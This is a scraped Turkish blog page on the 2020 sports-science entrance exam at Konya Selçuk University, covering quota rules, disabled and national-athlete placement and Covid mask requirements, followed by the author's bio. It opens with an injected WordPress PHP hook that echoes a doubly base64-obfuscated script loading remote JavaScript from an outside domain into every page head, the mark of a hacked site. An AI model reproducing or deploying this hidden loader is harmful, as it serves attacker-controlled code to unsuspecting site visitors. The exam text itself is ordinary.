function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); Konya Selçuk Üniversitesi Spor Bilimleri Fakültesi Spor Bilimleri Sınavı 2020 – Besyo Hakkında Güncel Bilgiler

Konya Selçuk Üniversitesi Spor Bilimleri Fakültesi Spor Bilimleri Sınavı 2020

29 Temmuz 2020
2020 Besyo Sınavı Kılavuzu
2 1

Milli Sporcu ve engelli kontenjanları toplam kontenjan içerisindedir. Milli ve engelli kontenjanı dolmadığı takdirde bu kontenjanlar genel kontenjana eklenecektir. ‐ İlgili programa başvuran engelli öğrenci kontenjanının ayrılan kontenjandan fazla olması durumunda, özel yetenek sınavını kazanan ancak ayrılan kontenjana yerleşemeyen adayların, ÖSYS Puanının değerlendirmeye katılan diğer öğrenciler ile birlikte ÖSYS puanlaması dahil edilerek değerlendirmeye tabi tutulacaktır,

Erkek milli kontenjanı dolmazsa kadın milli adaylardan puan sıralamasına göre, kadın milli kontenjanı dolmazsa erkek milli adaylar puan sıralamasına göre yerleştirilecektir.

Engelli adaylar sınavın, beceri koordinasyon parkur etabından muaftır. Bu adaylar spor özgeçmişleri ile değerlendirmeye alınacaktır.

6 Engelli kontenjanları dolmadığı taktirde öncelikle engelli kontenjanları kendi içerisinde tamamlanacak yine eksik kontenjan kalır ise boş kontenjan genel kontenjana aktarılacaktır.

Adaylar otomatik olarak bütün bölümlere müracaat etmiş kabul edilecek fakat Beden Eğitimi ve Spor Öğretmenliği bölümüne TYT’den ilk 800 bine girme şartı aranacaktır.

Her program için asil ve yedek listeler de ayrı ayrı ilan edilecektir. Adayların Covid (19) tedbirleri nedeniyle ön kayıt ve sınavlara maske ile gelmeleri zorunludur.

Kılavuz ÖN DUYURU 10
http://www.instagram.com/alp.besyocuyuz

1993 yılında Bursa'da doğdum. Küçük yaşlarda spora merak salmaya başladım. Ailemin de desteğiyle çok küçük yaşlarda spora başladım. 2012 yılında Kastamonu Üniversitesi spor yöneticiliği bölümünü kazandım. Kastamonu'yu çeşitli sebeplerle bırakıp. 2015 yılında tekrar sınava girip Ankara Üniversitesi Antrenörlük bölümünü kazandım. 2017 Yılında Uludağ üniversitesine geçiş yaptım

Bir Cevap Yazın

Menü